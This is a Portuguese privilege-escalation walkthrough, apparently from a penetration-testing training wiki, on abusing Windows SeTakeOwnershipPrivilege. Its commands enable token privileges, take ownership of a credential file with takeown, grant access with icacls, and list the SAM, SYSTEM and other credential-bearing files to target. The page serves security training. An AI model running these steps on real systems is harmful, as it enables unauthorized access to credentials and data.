SeTakeOwnershipPrivilege

O privilégio SeTakeOwnershipPrivilege concede a um usuário a capacidade de assumir a propriedade de qualquer "objeto protegível", ou seja, objetos do Active Directory, arquivos/pastas NTFS, impressoras, chaves de registro, serviços e processos.

Revisão dos privilégios atuais do usuário

whoami /priv

Habilitando SeTakeOwnershipPrivilege

Observe na saída que o privilégio não está habilitado. Podemos habilitá-lo usando este script , detalhado nesta postagem do blog, bem como este outro, que se baseia no conceito inicial.

Import-Module .\Enable-Privilege.ps1
.\EnableAllTokenPrivs.ps1
whoami /priv

Selecionando um arquivo de destino

Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}

Verificando a propriedade do arquivo

cmd /c dir /q 'C:\Department Shares\Private\IT'

Agora podemos usar o comando binário takeown do Windows para alterar a propriedade do arquivo.

takeown /f 'C:\Department Shares\Private\IT\cred.txt'

Podemos confirmar a propriedade usando o mesmo comando de antes. Agora vemos que nossa conta de usuário é a proprietária do arquivo.

Get-ChildItem -Path 'C:\Department Shares\Private\IT\cred.txt' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}

Pode ser que ainda não consigamos ler o arquivo e precisemos modificar a ACL do arquivo icaclspara que possamos lê-lo

icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F

Arquivos de interesse

c:\inetpub\wwwwroot\web.config
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav

PreviousSeeDebugPrivilege NextWindows Built-in Groups

Last updated 4 days ago